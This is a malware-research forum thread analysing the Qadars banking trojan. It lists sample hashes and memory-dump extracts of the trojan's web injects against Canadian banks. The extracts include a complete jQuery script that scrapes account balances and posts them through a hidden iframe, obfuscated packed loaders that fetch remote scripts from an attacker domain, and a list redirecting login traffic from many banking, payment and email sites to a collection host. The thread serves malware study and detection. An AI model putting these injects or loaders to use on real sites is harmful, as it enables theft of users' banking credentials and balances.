 #21769  by rkhunter
 Sun Dec 22, 2013 5:49 pm
http://www.welivesecurity.com/2013/12/1 ... ts-sights/

Win32/Qadars (Nuclear Pack)
MD5: a1575979eccf5a820c5d6a2e0b8ba45b
SHA1: f31bf806920c97d9ca8418c9893052754df2eb4d
SHA256: ca3ea64b5a26f7eae7b48c93e0899552ef68b60dd7567b185364e1a73fe53057

Win32/Qadars (1.0.2.3)
MD5: 8cee78fcd2d5f98914ce38d2035a3d02
SHA1: dac7065529e59ae6fc366e23c470435b0fa6ebbe
SHA256: 04f0feb7ab6b68dabbebc3da2082afabacbe488bca3464f3da985a9b4d9c7c2c

Android/Perkele
MD5: 8db2b5a3268b08c9f5c8e031024041d4
SHA1: b2c70ca7112d3fd3e0a88d2d38647318e68f836f
SHA256: a9ee4bb7877f75552176c4a9de4ab916bbd0ddebc22604be2cb07674f6939119
 #22857  by forty-six
 Mon May 12, 2014 9:33 pm
Has a VM check at 0043AFA2.
000453C8  00001010
000453D4  00001011
000453E0  00001004
000453EC  0000
000453F4  00001007
00045400  0000
00045408  00001008
00045414  0000
0004541C  00001009
00045428  0000
00045430  0000
00045438  00001001
00045444  0000
0004544C  00001003
00045458  0000
00045460  00001006
0004546C  0000
00045474  00001012
00045480  0000
00045490  00001002
Looks like a couple of commands are missing from ESET's list.
 #26014  by Kafeine
 Sat Jun 06, 2015 7:55 pm
After striking exclusively in France, then exclusively in the Netherlands, it seems (based on the distribution) that Qadars has been targeting Canada for a few days now.

Could anyone confirm this by extracting the injects?

Attached is a fresh (dropped by Angler) sample.
563379a48d876f6c35317bb7551efeb55754123056109ab030d1e796ae1b9c2c
Last edited by Kafeine on Sat Jun 06, 2015 7:56 pm, edited 2 times in total.
 #26015  by robemtnez
 Sun Jun 07, 2015 3:43 am
It gets the web injects from freechristmasgifts2014.com, which was already active in August last year according to http://cybercrime-tracker.net/index.php ... ts2014.com

TD: https://freechristmasgifts2014.com/tdadmin/td.js
RBC: https://freechristmasgifts2014.com/rbcadmin/rbc.js
BMO: https://freechristmasgifts2014.com/bmoadmin/bmo.js
CIBC: https://freechristmasgifts2014.com/cibcadmin/cibc.js
Scotiabank: https://freechristmasgifts2014.com/scot ... /scotia.js

From a memory dump of svchost.exe:
0x199310 (15): ndwInjectsCount
0x199320 (10): ilpInjects
0x199336 (39): http*bmo.com/onlinebanking/OLB*gdwFlags
0x19935e (43): jlpszBeforeg<head*>ilpszAfter`jlpszInjecty	
0x19938a (2477): <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script>

// Stage check of the webinject recovered from the svchost.exe memory dump.
// Returns true only when all five jQuery probes match, i.e. the page shows
// the "My Accounts" overview table with its Account Type / Account # /
// As Of Date / Totals headers (the inject's URL mask in the dump targets
// bmo.com/onlinebanking/OLB). Nothing is sent from this function; it only
// gates the scrape-and-post path. The selector strings are a convenient
// signature for detecting this inject in page content or proxy logs.
function IsOnBalanceStage(){
  var case1 = $("a.selected:contains('My Accounts')").length > 0;
  var case2 = $("th.accountType:contains('Account Type')").length > 0;
  var case3 = $("th.accountNumber:contains('Account #')").length > 0;
  var case4 = $("th.asOfDate:contains('As Of Date')").length > 0;
  var case5 = $("th.totals:contains('Totals')").length > 0;
  return case1 && case2 && case3 && case4 && case5;
}

// Scrapes the account overview table from the DOM and returns an array of
// {accountName, accountNumber, date, balance} records, one per row.
// slice(0,-1) drops the last row (presumably a totals row -- not confirmed
// from the dump). Each field is the text of a fixed cell position: cell 0's
// first child for the name, then cells 1, 2 and 3 verbatim. This is a pure
// DOM read; the data only leaves the page via DoSendBalances.
function DoGrabBalances() {
  var balances = new Array();
  $("tbody#BankAccounts td.tableContainer table tbody tr").slice(0,-1).each(function(){
    var accountBalance = {};
    accountBalance.accountName = $(this).children().slice(0,1).children().slice(0,1).text();
    accountBalance.accountNumber = $(this).children().slice(1,2).text();
    accountBalance.date = $(this).children().slice(2,3).text();
    accountBalance.balance = $(this).children().slice(3,4).text();
    balances.push(accountBalance);
  });
  return balances;
}

// Constructor for a hidden POST channel: appends an invisible iframe and a
// <form method=post action=url> whose target is that iframe, so submitting
// the form does not navigate the visible page. Both elements get the name
// 'iframe'+<timestamp>; each construction adds a new pair to <body> and
// nothing removes them, which is a detectable DOM artefact (a display:none
// iframe with a numeric-suffixed id next to a form targeting it).
//   addParameter(parameter, value): appends <input type=hidden> with the
//     given name/value to the form.
//   send(): submits the form.
function iframeform(url)
{
    var object = this;
    // Timestamp doubles as a unique suffix for the iframe id/name.
    object.time = new Date().getTime();
    var iframe = $('<iframe style="display:none;"></iframe>');
    $("body").append(iframe); 
    iframe.attr({'id': 'iframe'+object.time});
    iframe.attr({'name': 'iframe'+object.time});
    object.form = $("<form></form>");
    $("body").append(object.form);
    // Target the hidden iframe so the POST response never replaces the page.
    object.form.attr({'target': 'iframe'+object.time});
    object.form.attr({'method': 'post'});
    object.form.attr({'action': url});
    object.addParameter = function(parameter,value)
    {
        $("<input type='hidden' />")
         .attr("name", parameter)
         .attr("value", value)
         .appendTo(object.form);
    };
    object.send = function()
    {
        object.form.submit();
    };
}

// Posts the scraped records through a hidden iframeform. The action is a
// same-origin path that looks like a static icon (ico_iHover.png), so the
// request blends into normal bank traffic in browser/proxy logs; the bank
// server itself would only return the image, so presumably the trojan's
// browser hooks pick the POST off before it leaves the host -- not confirmed
// from this dump. Body: a fixed "clsid=balls" marker plus one "ballN" field
// per array index, with the four fields pipe-joined. The for-in guard keeps
// only own, canonical non-negative integer keys (<= 2^32-2, i.e. real array
// indices). `key` is never declared, so it becomes an implicit global.
function DoSendBalances(balances) {
  var poster = new iframeform("/onlinebanking/onlinebanking/en/images/icons/ico_iHover.png");
  poster.addParameter("clsid", "balls");
  for (key in balances) {
    if (balances.hasOwnProperty(key) && /^0$|^[1-9]\d*$/.test(key) && key <= 4294967294) {
      poster.addParameter("ball"+key.toString(), balances[key].accountName+"|"+balances[key].accountNumber+"|"+balances[key].date+"|"+balances[key].balance);
    }
  }
 poster.send();
}
 
// Entry point of the inject: once the DOM is ready, scrape and post the
// balances, but only when every overview-page marker is present.
// `== true` is a loose comparison against a boolean, so it is just a
// truthiness check here.
$(document).ready(function(){
if (IsOnBalanceStage() == true) {
  DoSendBalances(DoGrabBalances());
}
});

</script>
0x199d38 (54): glpszURLx$https://www*.bmo.com/onlinebanking/*gdwFlags
0x199d6f (12): jlpszBeforex
0x199d7c (39): function eStatementDialog(){ilpszAfterx
0x199da4 (38): function linkMyAccount(){jlpszInjecta}
0x199dcb (54): glpszURLx$https://www*.bmo.com/onlinebanking/*gdwFlags
0x199e02 (42): jlpszBeforeg<head*>ilpszAfter`jlpszInjectx
0x199e2d (141): <script>document.write('<sc'+'ript src="https://freechristmasgifts2014.com/bmoadmin/bmo.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
0x199ebb (62): glpszURLx,http*://www*.scotiabank.com/gls/*/index.htmlgdwFlags
0x199efa (129): jlpszBeforeg<head*>ilpszAfter`jlpszInjectxV<script>top.location.href = "http://www.scotiabank.com/ca/en/0,,2,00.html";
</script>
0x199f7c (67): glpszURLx1https://www*.scotiaonline.scotiabank.com/online/*gdwFlags
0x199fc0 (43): jlpszBeforeg<head*>ilpszAfter`jlpszInjecty

0x199fec (2741): <script>var script_link = "https://freechristmasgifts2014.com/scotiaadmin/scotia.js?r="+Number(new Date());eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 J=(4(){7 d,g,8={};8["[9 16]"]="17";8["[9 18]"]="19";8["[9 K]"]="1a";8["[9 1b]"]="4";8["[9 1c]"]="L";8["[9 1d]"]="1e";8["[9 1f]"]="1g";8["[9 M]"]="9";7 f={t:m,u:1,1h:4(a){3(a){f.u++}j{f.6(n)}},6:4(a){3((a===n&&!--f.u)||(a!==n&&!f.t)){3(!2.N){5 C(f.6,1)}f.t=n;3(a!==n&&--f.u>0){5}d.v(2,[f])}},O:4(){3(d){5}d=f.P();3(2.Q==="R"){5 C(f.6,1)}3(2.w){2.w("g",g,m);D.w("1i",f.6,m)}j 3(2.x){2.x("S",g);D.x("1j",f.6);7 a=m;E{a=D.1k==T}U(e){}3(2.V.W&&a){F()}}},P:4(){7 c=[],k,o,y,l={G:4(){3(!y){7 a=X,i,p,q,h,r;3(k){r=k;k=0}1l(i=0,p=a.p;i<p;i++){q=a[i];h=f.h(q);3(h==="L"){l.G.Y(l,q)}j 3(h==="4"){c.1m(q)}}3(r){l.v(r[0],r[1])}}5 s},v:4(a,b){3(!y&&!k&&!o){b=b||[];o=1;E{1n(c[0]){c.1o().Y(a,b)}}1p{k=[a,b];o=0}}5 s},1q:4(){l.v(s,X);5 s},1r:4(){5!!(o||k)},1s:4(){y=1;c=[];5 s}};5 l},h:4(a){5 a==T?K(a):8[M.1t.1u.1v(a)]||"9"}};4 F(){3(f.t){5}E{2.V.W("1w")}U(e){C(F,1);5}f.6()}3(2.w){g=4(){2.1x("g",g,m);f.6()}}j 3(2.x){g=4(){3(2.Q==="R"){2.1y("S",g);f.6()}}}4 6(a){f.O();7 b=f.h(a);d.G(a)}5 6})();4 Z(){3(2.H("z")){2.H("z").1z.1A(2.H("z"))}7 a="1B {1C:1D !1E}";7 b=2.10("1F");b.11("h","12/1G");b.11("13","z");3(1H.1I.1J().1K("1L")>=0){b.1M=a}j{3(b.14){b.14.1N=a}j{b.A(2.1O(a))}}2.B("I")[0].A(b)}4 15(a){7 
b=2.10("1P");b.h="12/1Q";b.13="1R";b.1S=a;3(2.B("I").p>0){2.B("I")[0].A(b)}j{2.B("N")[0].A(b)}}Z();J(4(){15(1T)});',62,118,'||document|if|function|return|ready|var|class2type|object|||||||DOMContentLoaded|type||else|fired|deferred|false|true|firing|length|elem|_fired|this|isReady|readyWait|resolveWith|addEventListener|attachEvent|cancelled|document_hide_css|appendChild|getElementsByTagName|setTimeout|window|try|doScrollCheck|done|getElementById|head|cReady|String|array|Object|body|bindReady|_Deferred|readyState|complete|onreadystatechange|null|catch|documentElement|doScroll|arguments|apply|hideContent|createElement|setAttribute|text|id|styleSheet|loadScript|Boolean|boolean|Number|number|string|Function|Array|Date|date|RegExp|regexp|holdReady|load|onload|frameElement|for|push|while|shift|finally|resolve|isResolved|cancel|prototype|toString|call|left|removeEventListener|detachEvent|parentNode|removeChild|html|display|none|important|style|css|navigator|userAgent|toLowerCase|indexOf|firefox|innerHTML|cssText|createTextNode|script|javascript|jsess_script_loader|src|script_link'.split('|'),0,{}));</script>
0x19aaac (37): https://*.royalbank.com/*/*/*gdwFlags
0x19aad2 (43): jlpszBeforeg<head*>ilpszAfter`jlpszInjecty

0x19aafe (2735): <script>var script_link = "https://freechristmasgifts2014.com/rbcadmin/rbc.js?r="+Number(new Date());eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 J=(4(){7 d,g,8={};8["[9 16]"]="17";8["[9 18]"]="19";8["[9 K]"]="1a";8["[9 1b]"]="4";8["[9 1c]"]="L";8["[9 1d]"]="1e";8["[9 1f]"]="1g";8["[9 M]"]="9";7 f={t:m,u:1,1h:4(a){3(a){f.u++}j{f.6(n)}},6:4(a){3((a===n&&!--f.u)||(a!==n&&!f.t)){3(!2.N){5 C(f.6,1)}f.t=n;3(a!==n&&--f.u>0){5}d.v(2,[f])}},O:4(){3(d){5}d=f.P();3(2.Q==="R"){5 C(f.6,1)}3(2.w){2.w("g",g,m);D.w("1i",f.6,m)}j 3(2.x){2.x("S",g);D.x("1j",f.6);7 a=m;E{a=D.1k==T}U(e){}3(2.V.W&&a){F()}}},P:4(){7 c=[],k,o,y,l={G:4(){3(!y){7 a=X,i,p,q,h,r;3(k){r=k;k=0}1l(i=0,p=a.p;i<p;i++){q=a[i];h=f.h(q);3(h==="L"){l.G.Y(l,q)}j 3(h==="4"){c.1m(q)}}3(r){l.v(r[0],r[1])}}5 s},v:4(a,b){3(!y&&!k&&!o){b=b||[];o=1;E{1n(c[0]){c.1o().Y(a,b)}}1p{k=[a,b];o=0}}5 s},1q:4(){l.v(s,X);5 s},1r:4(){5!!(o||k)},1s:4(){y=1;c=[];5 s}};5 l},h:4(a){5 a==T?K(a):8[M.1t.1u.1v(a)]||"9"}};4 F(){3(f.t){5}E{2.V.W("1w")}U(e){C(F,1);5}f.6()}3(2.w){g=4(){2.1x("g",g,m);f.6()}}j 3(2.x){g=4(){3(2.Q==="R"){2.1y("S",g);f.6()}}}4 6(a){f.O();7 b=f.h(a);d.G(a)}5 6})();4 Z(){3(2.H("z")){2.H("z").1z.1A(2.H("z"))}7 a="1B {1C:1D !1E}";7 b=2.10("1F");b.11("h","12/1G");b.11("13","z");3(1H.1I.1J().1K("1L")>=0){b.1M=a}j{3(b.14){b.14.1N=a}j{b.A(2.1O(a))}}2.B("I")[0].A(b)}4 15(a){7 
b=2.10("1P");b.h="12/1Q";b.13="1R";b.1S=a;3(2.B("I").p>0){2.B("I")[0].A(b)}j{2.B("N")[0].A(b)}}Z();J(4(){15(1T)});',62,118,'||document|if|function|return|ready|var|class2type|object|||||||DOMContentLoaded|type||else|fired|deferred|false|true|firing|length|elem|_fired|this|isReady|readyWait|resolveWith|addEventListener|attachEvent|cancelled|document_hide_css|appendChild|getElementsByTagName|setTimeout|window|try|doScrollCheck|done|getElementById|head|cReady|String|array|Object|body|bindReady|_Deferred|readyState|complete|onreadystatechange|null|catch|documentElement|doScroll|arguments|apply|hideContent|createElement|setAttribute|text|id|styleSheet|loadScript|Boolean|boolean|Number|number|string|Function|Array|Date|date|RegExp|regexp|holdReady|load|onload|frameElement|for|push|while|shift|finally|resolve|isResolved|cancel|prototype|toString|call|left|removeEventListener|detachEvent|parentNode|removeChild|html|display|none|important|style|css|navigator|userAgent|toLowerCase|indexOf|firefox|innerHTML|cssText|createTextNode|script|javascript|jsess_script_loader|src|script_link'.split('|'),0,{}));</script>
0x19b5b8 (34): https://easyweb*.td*.com/*gdwFlags
0x19b5db (42): jlpszBeforeg<head*>ilpszAfter`jlpszInjecty
0x19b607 (443): <script>if(/(ca\.tdbank\.banking\.servlet)|(login\.htm)/im.test(self.location.href) && !/LoginInterceptServlet|LoginRedirectServlet/im.test(self.location.href)){var script_link = "https://freechristmasgifts2014.com/tdadmin/td.js?r="+Number(new Date());var script = document.createElement("script");script.type = "text/javascript";script.src = script_link;document.getElementsByTagName("head")[0].appendChild(script);}</script>pdwRedirectsCount
 #26047  by sysopfb
 Tue Jun 09, 2015 10:57 pm
C:\Soft\qadars\Release\modules\moduleMain_32.pdb
bot_upload_exe
bot_update_exe
bot_update
os_reboot

n*verisign.com*n*digicert.com*l*thawte.com*x!*safebrowsing.clients.google.com*x
*gtssl-ocsp.geotrust.com*u*clients1.google.com*n*gb.symcd.com*t*ocsp-responder.com*p*globalsign.com*r*data.mozilla.com*s*ocsp.omniroot.com*x
*safebrowsing.google.com*x
*urs.microsoft.com/urs.asmx*x
*tiles.services.mozilla.com*w*telemetry.mozilla.org*t*facebook.com/ajax/*x
*localhost:26143/skypectoc/*s*youtube.com/watch*r*youtube.com/api/*q*plus.google.com*q*news.google.com*x
*facebook.com/stickers/*m*savecdn.com*l*.lphbs.com*u*geo.query.yahoo.com*x
*pr.comet.yahoo.com/comet*x$*.mail.yahoo.com/ws/mail/v*/jsonrpc*x
*syndication.twitter.com/i/jot*x
*analytics.query.yahoo.com*qdwExceptionsCount
ilpHeaders
px-xss-protectionx
x-content-security-policyox-frame-optionsvx-content-type-optionslx-webkit-cspix-insightwcontent-security-policyndwHeadersCount
ndwInjectsCount
ilpInjects
glpszURLx
http*bmo.com/onlinebanking/OLB*gdwFlags
jlpszBeforeg<head*>ilpszAfter
jlpszInjecty	
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script>
function IsOnBalanceStage(){
  var case1 = $("a.selected:contains('My Accounts')").length > 0;
  var case2 = $("th.accountType:contains('Account Type')").length > 0;
  var case3 = $("th.accountNumber:contains('Account #')").length > 0;
  var case4 = $("th.asOfDate:contains('As Of Date')").length > 0;
  var case5 = $("th.totals:contains('Totals')").length > 0;
  return case1 && case2 && case3 && case4 && case5;
function DoGrabBalances() {
  var balances = new Array();
  $("tbody#BankAccounts td.tableContainer table tbody tr").slice(0,-1).each(function(){
    var accountBalance = {};
    accountBalance.accountName = $(this).children().slice(0,1).children().slice(0,1).text();
    accountBalance.accountNumber = $(this).children().slice(1,2).text();
    accountBalance.date = $(this).children().slice(2,3).text();
    accountBalance.balance = $(this).children().slice(3,4).text();
    balances.push(accountBalance);
  });
  return balances;
function iframeform(url)
    var object = this;
    object.time = new Date().getTime();
    var iframe = $('<iframe style="display:none;"></iframe>');
    $("body").append(iframe); 
    iframe.attr({'id': 'iframe'+object.time});
    iframe.attr({'name': 'iframe'+object.time});
    object.form = $("<form></form>");
    $("body").append(object.form);
    object.form.attr({'target': 'iframe'+object.time});
    object.form.attr({'method': 'post'});
    object.form.attr({'action': url});
    object.addParameter = function(parameter,value)
    {
        $("<input type='hidden' />")
         .attr("name", parameter)
         .attr("value", value)
         .appendTo(object.form);
    };
    object.send = function()
    {
        object.form.submit();
    };
function DoSendBalances(balances) {
  var poster = new iframeform("/onlinebanking/onlinebanking/en/images/icons/ico_iHover.png");
  poster.addParameter("clsid", "balls");
  for (key in balances) {
    if (balances.hasOwnProperty(key) && /
[1-9]\d*$/.test(key) && key <= 4294967294) {
      poster.addParameter("ball"+key.toString(), balances[key].accountName+"|"+balances[key].accountNumber+"|"+balances[key].date+"|"+balances[key].balance);
    }
 poster.send();
$(document).ready(function(){
if (IsOnBalanceStage() == true) {
  DoSendBalances(DoGrabBalances());
</script>
glpszURLx$https://www*.bmo.com/onlinebanking/*gdwFlags
jlpszBeforex
function eStatementDialog(){ilpszAfterx
function linkMyAccount(){jlpszInjecta}
glpszURLx$https://www*.bmo.com/onlinebanking/*gdwFlags
jlpszBeforeg<head*>ilpszAfter
jlpszInjectx
<script>document.write('<sc'+'ript src="https://freechristmasgifts2014.com/bmoadmin/bmo.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
glpszURLx,http*://www*.scotiabank.com/gls/*/index.htmlgdwFlags
jlpszBeforeg<head*>ilpszAfter
jlpszInjectxV<script>top.location.href = "http://www.scotiabank.com/ca/en/0,,2,00.html";
</script>
glpszURLx1https://www*.scotiaonline.scotiabank.com/online/*gdwFlags
jlpszBeforeg<head*>ilpszAfter
jlpszInjecty
<script>var script_link = "https://freechristmasgifts2014.com/scotiaadmin/scotia.js?r="+Number(new Date());eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/
olean|Number|number|string|Function|Array|Date|date|RegExp|regexp|holdReady|load|onload|frameElement|for|push|while|shift|finally|resolve|isResolved|cancel|prototype|toString|call|left|removeEventListener|detachEvent|parentNode|removeChild|html|display|none|important|style|css|navigator|userAgent|toLowerCase|indexOf|firefox|innerHTML|cssText|createTextNode|script|javascript|jsess_script_loader|src|script_link'.split('|'),0,{}));</script>
glpszURLx
https://*.royalbank.com/*/*/*gdwFlags
jlpszBeforeg<head*>ilpszAfter
jlpszInjecty
<script>var script_link = "https://freechristmasgifts2014.com/rbcadmin/rbc.js?r="+Number(new Date());eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/
olean|Number|number|string|Function|Array|Date|date|RegExp|regexp|holdReady|load|onload|frameElement|for|push|while|shift|finally|resolve|isResolved|cancel|prototype|toString|call|left|removeEventListener|detachEvent|parentNode|removeChild|html|display|none|important|style|css|navigator|userAgent|toLowerCase|indexOf|firefox|innerHTML|cssText|createTextNode|script|javascript|jsess_script_loader|src|script_link'.split('|'),0,{}));</script>
glpszURLx
https://easyweb*.td*.com/*gdwFlags
jlpszBeforeg<head*>ilpszAfter
jlpszInjecty
<script>if(/(ca\.tdbank\.banking\.servlet)|(login\.htm)/im.test(self.location.href) && !/LoginInterceptServlet|LoginRedirectServlet/im.test(self.location.href)){var script_link = "https://freechristmasgifts2014.com/tdadmin/td.js?r="+Number(new Date());var script = document.createElement("script");script.type = "text/javascript";script.src = script_link;document.getElementsByTagName("head")[0].appendChild(script);}</script>pdwRedirectsCount
)klpRedirects
glpszURLx&*accounts.google.com/ServiceLoginAuth*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx"*login.live.com/ppsecure/post.srf*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx&*facebook.com/login.php?login_attempt*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*paypal.com/signin/intent*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*paypal.com/*/cgi-bin/webscr*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx(*bwin.com/*/authentication/signon/index*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLv*btc-e.com/ajax/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*mtgox.com/code/login_bis.json*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*bitstamp.net/account/login/*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLt*bitcoin.de/*/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLt*cavirtex.com/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*login.yahoo.com/config/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*login.szn.cz/loginProcess*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLv*login.mail.com/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx6*webmail.kpnmail.nl/RedirectHandler.ashx?action=logon*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx *login.libero.it/logincheck.php*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx(*upcmail.upc.nl/ajax/login?action=login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*upcmail.net/do/dologin?v=upc*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx"*mail.ziggo.nl/appsuite/api/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLv*twitter.com/sessions*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLo*/wp-login.php*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLq*cap?RID=*&VAA=B*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*account.skrill.com/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLr*payweb.com/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLw*okpay.com/ru/account/*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx/*secure.pecunix.com/money.cfm?fact=validatePin*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*paxum.com/payment/phrame.php*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*payeer.com/ajax/index.php*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx/*signin.ebay.com/ws/eBayISAPI.dll?co_partnerId*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLj*checkout*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLi*payment*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*secure.worldpay.com/wcc/card*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLl*processing*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLi*confirm*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLj*merchant*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLs*/prod/order_Agree*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx@*online.americanexpress.com/myca/logon/*/action/LogLogonHandler*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx1*bankofamerica.com/login/sign-in/entry/signOn.go*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*chase.com/auth/fcc/login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx+*onlinebanking.usbank.com/Auth/Login/Login*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
glpszURLx
*online.wellsfargo.com/signon*olpszRedirectURLx&https://digidetectsys.com/analytic.phpgdwFlags
 #26314  by R136a1
 Sat Jul 18, 2015 1:45 pm
Hi,

Attached are some Qadars samples (x86/x64). The internal version of the x86 droppers is 2.0.0.0, while the version of the x64 component is 1.0.0.0.